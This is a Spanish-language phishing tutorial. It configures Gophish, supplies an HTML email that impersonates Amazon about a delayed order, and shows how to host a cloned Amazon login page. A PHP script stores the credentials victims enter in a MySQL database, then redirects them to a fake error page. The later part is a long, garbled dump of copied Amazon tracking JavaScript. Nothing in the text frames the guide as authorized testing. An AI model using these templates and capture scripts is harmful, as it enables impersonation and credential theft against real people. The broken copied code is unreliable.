Phishing Técnicas y Resultados
Gophish [Configuracion]
Lo primero de todo tendremos que descargar la herramienta de Gophish
y que cree el servidor donde se aloja la pagina web para poder empezar a configurarla...
URL (Gophish) =
Por lo que lo descargaremos de la siguiente manera...
git clone
cd gophish/
go build
Una vez instalado todo y construido, lo ejecutaremos de la siguiente manera...
Cuando se ejecute la aplicacion las credenciales se mostraran en la terminal para que puedas iniciar sesion a parte de que se abrira automaticamente el login, pero en tal caso de que no se abriera nos proporcionara la URL
para poder ingresarla en internet...
level=info msg="Please login with the username admin and the password <PASSWORD>"
Sabremos que el usuario sera admin
y la password cambiara dependiendo del usuario, el link sera el siguiente...
Cuando inicies sesion con las credenciales por defecto, te pedira que cambies la contraseña y una vez hecho eso, nos metera en la pagina para poder empezar a configurarla...
Lo primero que configuraremos sera la parte llamada como Email Templates
y dentro del mismo crearemos uno nuevo donde pone [+] New Template
para asi poder crear el email
que va a ver el usuario cuando se le envie...
En la parte de Name:
ponemos el nombre que queramos en mi caso le pondre GMAIL PHISHING
, donde pone Envelope Sender:
ponemos el email
que queremos que se vea cuando le llegue al usuario paar que sea todo mas real, donde pone Subject:
ponemos el titulo o la cabecera del correo que le va a llegar al usuario y por ultimo en la misma parte un poco mas abajo hay 2 opciones llamadas Text
elegiremos HTML
para poder programar el correo entero por asi decirlo, os dejo un ejemplo del codigo que programe y como se veria...
<style type="text/css">.input_letter {
font-size: 17px;
font-weight: bold;
.line {
color: grey;
height: 0.1px;
.line_head {
color: orange;
height: 10px;
background-color: orange;
border: none;
margin-top: 0px;
.box {
background-color: rgba(220, 220, 220,0.45);
border-radius: 3px;
padding: 10px;
font-size: 12.5px;
color: rgb(130, 130, 130);
span.letter {
font-family: Verdana, Geneva, Thaoma, sans-serif;
body {
font-family: Verdana, Geneva, Thaoma, sans-serif;
color: black;
<hr class="line_head" />
<p><img src="" width="300" /></p>
<hr class="line" />
<p>Estimado/a cliente,<br />
<br />
Lamentamos informarle que ha habido un problema con uno de sus pedidos recientes en Amazon. Para resolver este problema y asegurarnos de que reciba su pedido a tiempo, necesitamos que confirme algunos detalles de su cuenta.<br />
<br />
Si no resuelve este problema, es posible que su pedido se retrase o sea cancelado. Agradecemos su pronta atención a este asunto.<br />
<br />
Si tiene alguna pregunta o necesita asistencia adiccional, no dude en contactarnos a traves de nuestro servicio de atención al cliente.<br />
<br />
Atentamente,<br />
<br />
Equipo de Atención al Cliente Amazon.</p>
<p><a href="{{.URL}}"><input class="input_letter" style="background-color: orange; border: none; border-radius: 3px; padding: 15px 32px;" type="submit" value="Seguimiento de tu pedido" /></a></p>
<div class="box"><span class="letter">Si en el futuro prefieres no recibir correos electrónicos de Amazon de este tipo, selecciona la exlución voluntaria <a href="{{.URL}}">aquí</a></span><br />
<br />
<span class="letter">Referencia AKDFGD27DKIEHFU6-JDLJDJS423ILFPBNGS Amazon EU Sarl. Luxemburgo, Reg# B-1810102, 5 Rue Plaetis, L-23824 Luxemburgo. VAT # LU 2026781.</span><br />
<p><img src="" width="100" /></p>
Donde pone en el codigo {{.URL}}
es donde sustituiremos eso por el link que nos proporcionara la herramienta ngrok
pero eso mas adelante...
Una vez creado el correo lo guardaremos y nos iremos a la seccion de Sending Profiles
le daremos a crear uno nuevo [+] New Profile
donde pone Name:
pondremos el nombre que queramos sera para nosotros identificarlo en mi caso le llamare PHISHING SMTP
, donde pone SMTP From:
le pondremos el correo donde esta configurado nuestro servidor SMTP
o el que viene por defecto en nuestro correo creado de hotmail
SMTP From:
Donde pone Host:
pondremos el identificador de nuestro servidor SMTP
o el por defecto que viene en Microsoft
Y por ultimo donde pone Username
y Password
pondremos en Username
lo mismo que metimos en SMTP From
y en Password
la contraseña de ese correo...
Password: secret123
Ahora nos dirigimos a la seccion de Landing Pages
crearemos una pagina pero que no servira para nada, ya que no la utilizaremos pero la herramienta Gophish
obliga a tener una, pero mas adelante ya crearemos una pagina en nuestro puerto local de apache2
En mi caso a la pagina la llame test
en la opcion Name:
y la guardaremos [!] Aviso: esta pagina no va a servir para nada, es solo por que la herramienta lo pide
Despues nos dirigimos en la parte de Users & Groups
dentro del mismo crearemos uno donde pone [+] New Group
, en la parte de Name:
pondremos un nombre para identificarlo en mi caso lo llame Example_group
, y en las casillas llamadas...
First Name: Example
Last Name: Test
Position: CEO
Estas opciones las estamos configurando para que cuando enviemos el correo aparezca con el nombre y apellidos a parte de la posicion laboral que va a ser visible por el usuario si se pusiera a buscar, por lo que lo tendremos que adaptar al tipo de phishing
que estemos haciendo y por ultimo donde pone Email:
pondremos el email
con el que enviaremos el phishing
(Nuestro email
Una vez configurado todo lo añadiremos [+] Add
y lo guardaremos todo...
Ya por ultimo nos vamos a la seccion llamada Campaigns
y le daremos a [+] New Campaign
dentro de la configuracion lo configuraremos de la siguiente manera...
Donde pone Name:
pondremos el nombre con el que lo queramos identificar en mi caso lo llamare test_phishing
, en la parte de Email Template:
pondremos el email
que creamos anteriormente en mi caso lo llame GMAIL PHISHING
, en la parte de Landing Page:
pondremos el que llamamos test
, donde pone URL:
pondremos para todos lo mismo http://localhost
, en la parte de Sending Profile:
pondremos la configuracion del SMTP
que creamos anteriormente en mi caso llamado PHISHING SMTP
y por ultimo en la parte de Groups:
seleccionaremos el grupo anteriormente creado llamado en mi caso test_group
Como deberia de verse:
Una vez puesto todo lo anterior no guardaremos nada, le daremos en la opcion llamada Send Test Email
y dentro de la misma se configurara de la siguiente forma...
First Name: Victim
Last Name: Test
Position: CEO
Lo importante de aqui es poner en la parte de Email:
el email
del usuario victima al que se lo queremos mandar, pero antes de hacerlo, crearemos la pagina web phishing
desde nuestra terminal de la siguiente manera y ya retomaremos esta parte del envio...
Pagina Phishing [Configuracion apache2, mysql, ngrok, etc...]
Lo primero que haremos sera instalar apache2
sudo apt install apache2
Pero no podremos iniciarlo con systemctl
ya que por defecto se aloja en el puerto 80
y ese puerto ya esta cogido por un proceso de la herramienta Gophish
por lo que cambiaremos de puerto a apache2
de la siguiente forma...
nano /etc/apache2/ports.conf
#Dentro del nano
Listen <PORT>
Ejemplo (
nano /etc/apache2/ports.conf
#Dentro del nano
# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf
Listen 7755
<IfModule ssl_module>
Listen 443
<IfModule mod_gnutls.c>
Listen 443
Lo guardamos y con eso ya habriamos cambiado el puerto del apache2
, por lo que ahora lo iniciaremos...
systemctl start apache2
systemctl enable apache2
Con esto ya estaria en funcionamiento y establecido cada vez que se arranque el S.O. el apache2
Por lo que nos dirigimos a la siguiente ubicacion para borrar los archivos creados por defecto del apache2
cd /var/www/html/
rm *
rm /var/www/html/*
MySQL [Configuracion de captacion de credenciales]
Instalaremos y configuraremos una base de datos en mysql
para que cuando inserte las credenciales en la pagina de phishing
del login se envien automaticamente a la base de datos que crearemos en mysql
systemctl start mysqld
systemctl enable mysqld
Una vez instalado mysql
nos meteremos dentro del entorno para crear la base de datos con las credenciales por defecto de mysql
mysql -u root -p
Nos pedira una contraseña, pero lo dejaremos vacio y le daremos a enter
Una vez dentro haremos lo siguiente...
-- Crear base de datos --
CREATE DATABASE phishing_db;
-- Usar la base de datos --
USE phishing_db;
-- Crear tabla credentials --
CREATE TABLE credentials (
username VARCHAR(255) NOT NULL,
password VARCHAR(255) NOT NULL
Ahora configuraremos el usuario root
para que no surja ningun problema a la hora de configurar el .php
para que se escriban los datos en mysql
-- Cambiar la contraseña del usuario root --
ALTER USER 'root'@'localhost' IDENTIFIED BY 'root';
-- Conceder todos los privilegios al usuario root --
-- Actualizar los privilegios --
Una vez configurado todo saldremos de la base de datos del entorno de mysql
Configuracion de la pagina web phishing y captacion de datos en PHP
Nos vamos a la siguiente ubicacion para crear toda la estructura...
cd /var/www/html
Pagina Web
Lo llamaremos index.php
para que sea lo primero que se vea cuando le redirija el link...
<!doctype html>
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¿Has olvidado la contraseña?
<input type="password" maxlength="1024" id="password" autocomplete="current-password" name="password" tabindex="2" class="a-input-text a-span12 auth-required-field" aria-describedby="Introduce tu contraseña" aria-required="true" /><br><br>
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Una vez tengamos creado el login y el formulario con el action="process.php"
que le programamos para que cuando inicies sesion redirija a ese process.php
que ahora crearemos, crearemos el process.php
el cual sera el que capte las credenciales y las escriba en mysql
a parte de que te redirija a la vez a una pagina de error de la siguiente forma...
// Configuración de la base de datos
$servername = "localhost";
$db_username = "root";
$db_password = "root"; // Contraseña actualizada
$dbname = "phishing_db";
// Crear conexión
$conn = new mysqli($servername, $db_username, $db_password, $dbname);
// Verificar conexión
if ($conn->connect_error) {
die("Conexión fallida: " . $conn->connect_error);
// Obtener las credenciales del formulario
$user = $_POST['username'];
$pass = $_POST['password'];
// Validar que los datos no estén vacíos
if (empty($user) || empty($pass)) {
die("Usuario o contraseña no proporcionados.");
// Preparar y ejecutar la consulta
$stmt = $conn->prepare("INSERT INTO credentials (username, password) VALUES (?, ?)");
if ($stmt === false) {
die("Preparación de consulta fallida: " . $conn->error);
$stmt->bind_param("ss", $user, $pass);
if (!$stmt->execute()) {
die("Ejecución de consulta fallida: " . $stmt->error);
// Cerrar la declaración y la conexión
// Redirigir a una página de error falso o una página legítima
header("Location: index_error.php"); // Cambia esta URL a una URL de error o de redirección legítima
Aqui configuramos ya el archivo con la base de datos en mysql
para que se escriba en esa base de datos de esa tabla metiendose con el usuario root
con la contraseña root
y que te redirija al archivo index_error.php
el cual crearemos ahora mismo...
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var ue_err_chan = 'jserr-rw';
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function h(f, b) {
if (!( > a.mxe) && f) {
b = b || {};
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c && c !== k && c !== m && c !== n && c !== p ||;
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ex: f,
info: b
function l(a, b, c, e, g) {
m: a,
f: b,
l: c,
c: "" + e,
err: g,
fromOnError: 1,
args: arguments
}, g ? {
attribution: g.attribution,
logLevel: g.logLevel
} : void 0);
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n = "WARN",
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ec: 0,
ecf: 0,
pec: 0,
ts: 0,
erl: [],
ter: [],
buffer: [],
mxe: 50,
startTimer: function() {
setInterval(function() {
d.ue && a.pec < && d.uex("at");
a.pec =
}, 1E4)
l.skipTrace = 1;
h.skipTrace = 1;
h.isStub = 1;
d.ueLogError = h;
d.ue_err = a;
e.onerror = l
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function g() {
return (!(p in d) || 0 < d[p]) && (!(q in d) || 0 < d[q])
function h(c) {
if (b.ue.viz.length < w && !r) {
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c = c.originalEvent;
/^focus./.test(a) && c && (c.toElement || c.fromElement || c.relatedTarget) || (a = g() ? f[s] || ("blur" == a || "focusout" == a ? t : u) : t, b.ue.viz.push(a + ":" + (+new Date - b.ue.t0)), a == u && (b.ue.isl && x("at"), r = 1))
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v[n], k = (a ? a + "H" : "h") + "idden", e = "boolean" == typeof f[k]) l = a + "visibilitychange", s = (a ? a + "V" : "v") + "isibilityState";
e && f.addEventListener(l, h, 0);
m = g() ? 1 : 0;
d.addEventListener("resize", function() {
var a = g() ? 1 : 0;
m !== a && (m = a, h({}))
}, {
passive: !0
b.ue && e && (b.ue.pageViz = {
event: l,
propHid: k
})(ue_csm, ue_csm.document, ue_csm.window)
(function(d, h, N) {
function H(a) {
return a && a.replace && a.replace(/^\s+|\s+$/g, "")
function u(a) {
return "undefined" === typeof a
function B(a, b) {
for (var c in b) b[v](c) && (a[c] = b[c])
function I(a) {
try {
var b = N.cookie.match(RegExp("(^| )" + a + "=([^;]+)"));
if (b) return b[2].trim()
} catch (c) {}
function O(k, b, c) {
var q = (x || {}).type;
if ("device" !== c || 2 !== q && 1 !== q) k && (d.ue_id = = a.rid = k, w && (w = w.replace(/((.*?:){2})(\w+)/, function(a, b) {
return b + k
})), D && (e("id", D, k), D = 0)), b && (w && (w = w.replace(/(.*?:)(\w|-)+/, function(a,
c) {
return c + b
})), d.ue_sid = b), c && a.tag("page-source:" + c), d.ue_fpf = w
function P() {
var a = {};
return function(b) {
b && (a[b] = 1);
b = [];
for (var c in a) a[v](c) && b.push(c);
return b
function y(d, b, c, q) {
q = q || +new E;
var g, m;
if (b || u(c)) {
if (d)
for (m in g = b ? e("t", b) || e("t", b, {}) : a.t, g[d] = q, c) c[v](m) && e(m, b, c[m]);
return q
function e(d, b, c) {
var e = b && b != ?[b] : a;
e || (e =[b] = {});
"id" === d && c && (Q = 1);
return e[d] = c || e[d]
function R(d, b, c, e, g) {
c = "on" + c;
var m = b[c];
"function" === typeof m ? d && (a.h[d] = m) : m = function() {};
b[c] =
function(a) {
g ? (e(a), m(a)) : (m(a), e(a))
b[c] && (b[c].isUeh = 1)
function S(k, b, c, q) {
function p(b, c) {
var d = [b],
f = 0,
g = {},
m, h;
c ? (d.push("m=1"), g[c] = 1) : g =;
for (h in g)
if (g[v](h)) {
var q = e("wb", h),
p = e("t", h) || {},
n = e("t0", h) || a.t0,
if (c || 2 == q) {
q = q ? f++ : "";
d.push("sc" + q + "=" + h);
for (l in p) u(p[l]) || null === p[l] || d.push(l + q + "=" + (p[l] - n));
d.push("t" + q + "=" + p[k]);
if (e("ctb", h) || e("wb", h)) m = 1
}! J && m && d.push("ctb=1");
return d.join("&")
function m(b, c, f, e, g) {
if (b) {
var k = d.ue_err;
d.ue_url && !e && !g && b && 0 < b.length && (e =
new Image, a.iel.push(e), e.src = b, a.count && a.count("postbackImageSize", b.length));
w ? (g = h.encodeURIComponent) && b && (e = new Image, b = "" + d.ue_fpf + g(b) + ":" + (+new E - d.ue_t0), a.iel.push(e), e.src = b) : a.log && (a.log(b, "uedata", {
n: 1
}), a.ielf.push(b));
k && !k.ts && k.startTimer();
a.b && (k = a.b, a.b = "", m(k, c, f, 1))
function A(b) {
var c = x ? x.type : F,
d = 2 == c || a.isBFonMshop,
c = c && !d,
f = a.bfini;
if (!Q || a.isBFCache) f && 1 < f && (b += "&bfform=1", c || (a.isBFT = f - 1)), d && (b += "&bfnt=1", a.isBFT = a.isBFT || 1), a.ssw && a.isBFT && (a.isBFonMshop && (a.isNRBF =
0), u(a.isNRBF) && (d = a.ssw(a.oid), d.e || u(d.val) || (a.isNRBF = 1 < d.val ? 0 : 1)), u(a.isNRBF) || (b += "&nrbf=" + a.isNRBF)), a.isBFT && !a.isNRBF && (b += "&bft=" + a.isBFT);
return b
if (!a.paused && (b || u(c))) {
for (var l in c) c[v](l) && e(l, b, c[l]);
a.isBFonMshop || y("pc", b, c);
l = "ld" === k && b && e("wb", b);
var s = e("id", b) ||;
l || s === a.oid || (D = b, ba(s, (e("t", b) || {}).tc || +e("t0", b), +e("t0", b)));
var s = e("id", b) ||,
t = e("id2", b),
f = a.url + "?" + k + "&v=" + a.v + "&id=" + s,
J = e("ctb", b) || e("wb", b),
J && (f += "&ctb=" + J);
t && (f += "&id2=" + t);
1 < d.ueinit &&
(f += "&ic=" + d.ueinit);
if (!("ld" != k && "ul" != k || b && b != s)) {
if ("ld" == k) {
try {
h[K] && h[K].isUeh && (h[K] = null)
} catch (I) {}
if (
for (t = 0; t < L.length; t++) T(G, L[t]);
(t = N.ue_backdetect) && t.ue_back && t.ue_back.value++;
d._uess && (z = d._uess());
a.isl = 1
a._bf && (f += "&bf=" + a._bf());
d.ue_navtiming && g && (e("ctb", s, "1"), a.isBFonMshop || y("tc", F, F, M));
!C || a.isBFonMshop || U || (g && B(a.t, {
na_: g.navigationStart,
ul_: g.unloadEventStart,
_ul: g.unloadEventEnd,
rd_: g.redirectStart,
_rd: g.redirectEnd,
fe_: g.fetchStart,
lk_: g.domainLookupStart,
_lk: g.domainLookupEnd,
co_: g.connectStart,
_co: g.connectEnd,
sc_: g.secureConnectionStart,
rq_: g.requestStart,
rs_: g.responseStart,
_rs: g.responseEnd,
dl_: g.domLoading,
di_: g.domInteractive,
de_: g.domContentLoadedEventStart,
_de: g.domContentLoadedEventEnd,
_dc: g.domComplete,
ld_: g.loadEventStart,
_ld: g.loadEventEnd,
ntd: ("function" !== typeof || u(M) ? 0 : new E(M + - new E) + a.t0
}), x && B(a.t, {
ty: x.type + a.t0,
rc: x.redirectCount + a.t0
}), U = 1);
a.isBFonMshop || B(a.t, {
hob: d.ue_hob,
hoe: d.ue_hoe
a.ifr && (f += "&ifr=1")
b, c, q);
var r, n;
l || b && b !== s || ca(b);
(c = d.ue_mbl) && c.cnt && !l && (f += c.cnt());
l ? e("wb", b, 2) : "ld" == k && (a.lid = H(s));
for (r in
if (1 == e("wb", r)) break;
if (l) {
if (a.s) return;
f = p(f, null)
} else c = p(f, null), c != f && (c = A(c), a.b = c), z && (f += z), f = p(f, b ||;
f = A(f);
if (a.b || l)
for (r in 2 == e("wb", r) && delete[r];
z = 0;
a._rt && (f += "&rt=" + a._rt());
c = h.csa;
if (!l && c)
for (n in r = e("t", b) || {}, c = c("PageTiming"), r) r[v](n) && c("mark", da[n] || n, r[n]);
l || (a.s = 0, (n = d.ue_err) && 0 < && n.pec < && (n.pec =, f += "&ec=" + + "&ecf=" +
n.ecf), z = e("ctb", b), "ld" !== k || b || a.markers ? a.markers && a.isl && !l && b && B(a.markers, e("t", b)) : (a.markers = {}, B(a.markers, e("t", b))), e("t", b, {}));
a.tag && a.tag().length && (f += "&csmtags=" + a.tag().join("|"), a.tag = P());
n = a.viz || [];
(r = n.length) && (f += "&viz=" + n.splice(0, r).join("|"));
u(d.ue_pty) || (f += "&pty=" + d.ue_pty + "&spty=" + d.ue_spty + "&pti=" + d.ue_pti);
a.tabid && (f += "&tid=" + a.tabid);
a.aftb && (f += "&aftb=1");
!a._ui || b && b != s || (f += a._ui());
f += "&lob=" + (d.ue_lob || "0");
a.a = f;
m(f, k, z, l, b && "string" === typeof b && -1 !== b.indexOf("csa:"))
function ca(a) {
var b = h.ue_csm_markers || {},
for (c in b) b[v](c) && y(c, a, F, b[c])
function A(a, b, c) {
c = c || h;
if (c[V]) c[V](a, b, !1);
else if (c[W]) c[W]("on" + a, b)
function T(a, b, c) {
c = c || h;
if (c[X]) c[X](a, b, !1);
else if (c[Y]) c[Y]("on" + a, b)
function Z() {
function a() {
function b(a) {
return function() {
c[a] || (c[a] = 1, S(a))
var c = {},
e, g;
d.onLd = b("ld");
d.onLdEnd = b("ld");
d.onUl = b("ul");
e = {
stop: b("os")
}; ? (A(G, a), L.push(a)) : e[G] = d.onUl;
for (g in e) e[v](g) && R(0, h, g, e[g]);
d.ue_viz && ue_viz();
A("load", d.onLd);
function ba(e, b, c) {
var g = d.ue_mbl,
p = h.csa,
m = p && p("SPA"),
p = p && p("PageTiming");
g && g.ajax && g.ajax(b, c);
m && p && (m("newPage", {
requestId: e,
transitionType: "soft"
}), p("mark", "transitionStart", b));
d.ueinit = (d.ueinit || 0) + 1;
var a = d.ue = d.ue || {};
a.t0 = h.aPageStart || d.ue_t0; = d.ue_id;
a.url = d.ue_url;
a.rid = d.ue_id;
a.a = "";
a.b = "";
a.h = {};
a.s = 1;
a.t = {}; = {};
a.iel = [];
a.ielf = [];
a.viz = [];
a.v = "0.286992.0";
a.paused = !1;
var v = "hasOwnProperty",
G = "beforeunload",
K = "on" + G,
V = "addEventListener",
X = "removeEventListener",
W = "attachEvent",
Y = "detachEvent",
da = {
cf: "criticalFeature",
af: "aboveTheFold",
fn: "functional",
fp: "firstPaint",
fcp: "firstContentfulPaint",
bb: "bodyBegin",
be: "bodyEnd",
ld: "loaded"
E = h.Date,
C = h.performance || h.webkitPerformance,
g = (C || {}).timing,
x = (C || {}).navigation,
M = (g || {}).navigationStart,
w = d.ue_fpf,
Q = 0,
U = 0,
L = [],
D = 0,
a.oid = H(;
a.lid = H(;
a._t0 = a.t0;
a.tag = P();
a.ifr = !== h.self || h.frameElement ? 1 : 0;
a.markers = null;
a.attach = A;
a.detach = T;
if ("000-0000000-8675309" === d.ue_sid) {
var $ =
aa = I("session-id");
$ && aa && O($, aa, "cdn")
d.uei = Z;
d.ueh = R;
d.ues = e;
d.uet = y;
d.uex = S;
a.reset = O;
a.pause = function(d) {
a.paused = d
})(ue_csm, ue_csm.window, ue_csm.document);
ue.stub(ue, "log");
ue.stub(ue, "onunload");
ue.stub(ue, "onflush");
(function(b) {
function g() {
var a = {
requestId: b.ue_id || "rid",
server: b.ue_sn || "sn",
obfuscatedMarketplaceId: b.ue_mid || "mid"
b.ue_sjslob && (a.lob = b.ue_lob || "0");
return a
var a = b.ue,
h = 1 === b.ue_no_counters; = {}; = {}; = [];
a.count = function(b, f, c) {
var e = {},
d =,
g = c && 0 === c.c;
e.counter = b;
e.value = f;
e.t = a.d();
c && c.scope && (d =[c.scope] =[c.scope] || {}, e.scope = c.scope);
if (void 0 === f) return d[b];
d[b] = f;
d = 0;
c && && (d = 1);
h || (ue_csm.ue_sclog || !a.clog || 0 !== d || g ? a.log && a.log(e,
"csmcount", {
c: 1,
bf: d
}) : a.clog(e, "csmcount", {
bf: d
c: b,
v: f
a.count("baselineCounter2", 1);
a && a.event && (a.event(g(), "csm", "csm.CSMBaselineEvent.4"), a.count("nexusBaselineCounter", 1, {
bf: 1
var ue_hoe = +new Date();
window.ueinit = window.ue_ihb;
<!-- ctzqmqzljkox8hoi69yytvh5np4rizgyoxslr6 -->
window.ue && ue.count && ue.count('CSMLibrarySize', 10178)
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window.ue_ihe = (window.ue_ihe || 0) + 1;
if (window.ue_ihe === 1) {
(function(c) {
c && 1 === c.ue_jsmtf && "object" === typeof c.P && "function" === typeof c.P.when && c.P.when("mshop-interactions").execute(function(e) {
"object" === typeof e && "function" === typeof e.addListener && e.addListener(function(b) {
"object" === typeof b && "ORIGIN" === b.dataSource && "number" === typeof b.clickTime && "object" === typeof && "number" === typeof && (c.ue_jsmtf_interaction = {
ct: b.clickTime
(function(c, e, b) {
function m(a) {
f || (f = d[a.type].id, "undefined" === typeof a.clientX ? (h = a.pageX, k = a.pageY) : (h = a.clientX, k = a.clientY), 2 != f || l && (l != h || n != k) ? (r(), g.isl && e.setTimeout(function() {
}, 0)) : (l = h, n = k, f = 0))
function r() {
for (var a in d) d.hasOwnProperty(a) && g.detach(a, m, d[a].parent)
function s() {
for (var a in d) d.hasOwnProperty(a) && g.attach(a, m, d[a].parent)
function t() {
var a = "";
!q && f && (q = 1, a += "&ui=" + f);
return a
var g = c.ue,
p = c.uex,
q = 0,
f = 0,
l, n, h, k, d = {
click: {
id: 1,
parent: b
mousemove: {
id: 2,
parent: b
scroll: {
id: 3,
parent: e
keydown: {
id: 4,
parent: b
g && p && (s(), g._ui = t)
})(ue_csm, window, document);
(function(s, l) {
function m(b, e, c) {
c = c || new Date(+new Date + t);
c = "expires=" + c.toUTCString();
n.cookie = b + "=" + e + ";" + c + ";path=/"
function p(b) {
b += "=";
for (var e = n.cookie.split(";"), c = 0; c < e.length; c++) {
for (var a = e[c];
" " == a.charAt(0);) a = a.substring(1);
if (0 === a.indexOf(b)) return decodeURIComponent(a.substring(b.length, a.length))
return ""
function q(b, e, c) {
if (!e) return b; - 1 < b.indexOf("{") && (b = "");
for (var a = b.split("&"), f, d = !1, h = !1, g = 0; g < a.length; g++) f = a[g].split(":"), f[0] == e ? (!c || d ? a.splice(g, 1) : (f[1] = c, a[g] =
f.join(":")), h = d = !0) : 2 > f.length && (a.splice(g, 1), h = !0);
h && (b = a.join("&"));
!d && c && (0 < b.length && (b += "&"), b += e + ":" + c);
return b
var k = s.ue || {},
t = 3024E7,
n = ue_csm.document || l.document,
r = null,
a: {
try {
d = l.localStorage;
break a
} catch (u) {}
d = void 0
k.count && k.count("csm.cookieSize", document.cookie.length);
k.cookie = {
get: p,
set: m,
updateCsmHit: function(b, e, c) {
try {
var a;
if (!(a = r)) {
var f;
a: {
try {
if (d && d.getItem) {
f = d.getItem("csm-hit");
break a
} catch (k) {}
f = void 0
a = f || p("csm-hit") || "{}"
a = q(a, b, e);
r = a = q(a, "t", +new Date);
try {
d && d.setItem && d.setItem("csm-hit", a)
} catch (h) {}
m("csm-hit", a, c)
} catch (g) {
"function" == typeof l.ueLogError && ueLogError(Error("Cookie manager: " + g.message), {
logLevel: "WARN"
})(ue_csm, window);
(function(l, e) {
function c(b) {
b = "";
var c = a.isBFT ? "b" : "s",
d = "" + a.oid,
g = "" + a.lid,
h = d;
d != g && 20 == g.length && (c += "a", h += "-" + g);
a.tabid && (b = a.tabid + "+");
b += c + "-" + h;
b != f && 100 > b.length && (f = b, a.cookie ? a.cookie.updateCsmHit(m, b + ("|" + +new Date)) : e.cookie = "csm-hit=" + b + ("|" + +new Date) + n + "; path=/")
function p() {
f = 0
function d(b) {
!0 === e[a.pageViz.propHid] ? f = 0 : !1 === e[a.pageViz.propHid] && c({
type: "visible"
var n = "; expires=" + (new Date(+new Date + 6048E5)).toGMTString(),
m = "tb",
f, a = l.ue || {},
k = a.pageViz && a.pageViz.event &&
a.attach && (a.attach("click", c), a.attach("keyup", c), k || (a.attach("focus", c), a.attach("blur", p)), k && (a.attach(a.pageViz.event, d, e), d({})));
a.aftb = 1
})(ue_csm, ue_csm.document);
ue_csm.ue.stub(ue, "impression");
ue.stub(ue, "trigger");
if (window.ue && uet) {
window.ue && ue.count && ue.count('CSMLibrarySize', 3172)
! function() {
function n(n, t) {
var r = i(n);
return t && (r = r("instance", t)), r
var r = [],
c = 0,
i = function(t) {
return function() {
var n = c++;
return r.push([t, [], 0), n, {
}]), i(n)
n._s = r, this.csa = n
csa('Config', {});
if (window.csa) {
csa("Config", {
'Events.Namespace': 'csa',
'ObfuscatedMarketplaceId': 'A1RKKUPIHCS9HS',
'Events.SushiEndpoint': '',
'CacheDetection.RequestID': "KE82YVBED2PEDHPE6KTZ",
'CacheDetection.Callback': window.ue && ue.reset,
'LCP.elementDedup': 1,
'lob': '0'
csa("Events")("setEntity", {
page: {
requestId: "KE82YVBED2PEDHPE6KTZ",
meaningful: "interactive"
session: {
id: "260-7076577-0538233"
}! function(r) {
var e, i, o = "splice",
u = r.csa,
f = {},
c = {},
a = r.csa._s,
s = 0,
l = 0,
g = -1,
h = {},
v = {},
d = {},
n = Object.keys,
p = function() {};
function t(n, t) {
return u(n, t)
function m(n, t) {
var r = c[n] || {};
k(r, t), c[n] = r, l++, S(U, 0)
function w(n, t, r) {
var i = !0;
return t = D(t), r && r.buffered && (i = (d[n] || []).every(function(n) {
return !1 !== t(n)
})), i ? (h[n] || (h[n] = []), h[n].push(t), function() {
! function(n, t) {
var r = h[n];
r && r[o](r.indexOf(t), 1)
}(n, t)
}) : p
function b(n, t) {
if (t = D(t), n in v) return t(v[n]), p;
return w(n, function(n) {
return t(n), !1
function y(n, t) {
if (u("Errors")("logError", n), f.DEBUG) throw t || n
function E() {
return Math.abs(4294967295 * Math.random() | 0).toString(36)
function D(n, t) {
return function() {
try {
return n.apply(this, arguments)
} catch (n) {
y(n.message || n, n)
function S(n, t) {
return r.setTimeout(D(n), t)
function U() {
for (var n = 0; n < a.length;) {
var t = a[n],
r = t[0] in c;
if (!r && !i) return void(s = a.length);
r ? (a[o](s = n, 1), I(t)) : n++
g = l
function I(n) {
var t = c[n[0]],
r = n[1],
i = r[0];
if (!t || !t[i]) return y("Undefined function: " + t + "/" + i);
e = n[3], c[n[2]] = t[i].apply(t, r.slice(1)) || {}, e = 0
function O() {
i = 1, U()
function k(t, r) {
n(r).forEach(function(n) {
t[n] = r[n]
b("$beforeunload", O), m("Config", {
instance: function(n) {
k(f, n)
}), u.plugin = D(function(n) {
}), t.config = f, t.register = m, t.on = w, t.once = b, t.blank = p, t.emit = function(n, t, r) {
for (var i = h[n] || [], e = 0; e < i.length;) !1 === i[e](t) ? i[o](e, 1) : e++;
v[n] = t || {}, r && r.buffered && (d[n] || (d[n] = []), 100 <= d[n].length && d[n].shift(), d[n].push(t || {}))
}, t.UUID = function() {
return [E(), E(), E(), E()].join("-")
}, t.time = function(n) {
var t = e ? new Date(e.time) : new Date;
return "ISO" === n ? t.toISOString() : t.getTime()
}, t.error = y, t.warn = function(n, t) {
if (u("Errors")("logWarn", n), f.DEBUG) throw t || n
}, t.exec = D, t.timeout = S, t.interval = function(n, t) {
return r.setInterval(D(n), t)
}, ( = r).csa._s.push = function(n) {
n[0] in c && (!a.length || i) ? (I(n), a.length && g !== l && U()) : a[o](s++, 0, n)
}, U(), S(function() {
S(O, f.SkipMissingPluginsTimeout || 5e3)
}, 1)
}("undefined" != typeof window ? window : global);
csa.plugin(function(o) {
var f = "addEventListener",
e = "requestAnimationFrame",
t = o.exec,
r =,
u = o.on;
o.raf = function(n) {
if (r[e]) return r[e](t(n))
}, o.on = function(n, e, t, r) {
if (n && "function" == typeof n[f]) {
var i = o.exec(t);
return n[f](e, i, r),
function() {
n.removeEventListener(e, i, r)
return "string" == typeof n ? u(n, e, t, r) : o.blank
csa.plugin(function(o) {
var t, n, r = {},
e = "localStorage",
c = "sessionStorage",
a = "local",
i = "session",
u = o.exec;
function s(e, t) {
var n;
try {
r[t] = !!(n =[e]), n = n || {}
} catch (e) {
r[t] = !(n = {})
return n
function f() {
t = t || s(e, a), n = n || s(c, i)
function l(e) {
return e && e[i] ? n : t
} = u(function(e, t, n) {
var o = l(n);
return e ? t ? void(o[e] = t) : o[e] : Object.keys(o)
}), o.storageSupport = u(function() {
return f(), r
}), o.deleteStored = u(function(e, t) {
var n = l(t);
if ("function" == typeof e)
for (var o in n) n.hasOwnProperty(o) && e(o, n[o]) && delete n[o];
else delete n[e]
csa.plugin(function(n) {
n.types = {
ovl: function(n) {
var r = [];
if (n)
for (var i in n) n.hasOwnProperty(i) && r.push(n[i]);
return r
csa.plugin(function(c) {
var e = c.config;
function n(n) {
return function(e) {
c("Metrics", {
producerId: "csa",
dimensions: {
message: e
})("recordMetric", n, 1)
function r(r) {
var o, t, l = c("Events", {
producerId: r.producerId,
lob: e.lob || "0"
u = ["name", "type", "csm", "adb"],
i = {
url: "pageURL",
file: "f",
line: "l",
column: "c"
this.log = function(e) {
if (! function(e) {
if (!e) return !0;
for (var n in e) return !1;
return !0
}(e)) {
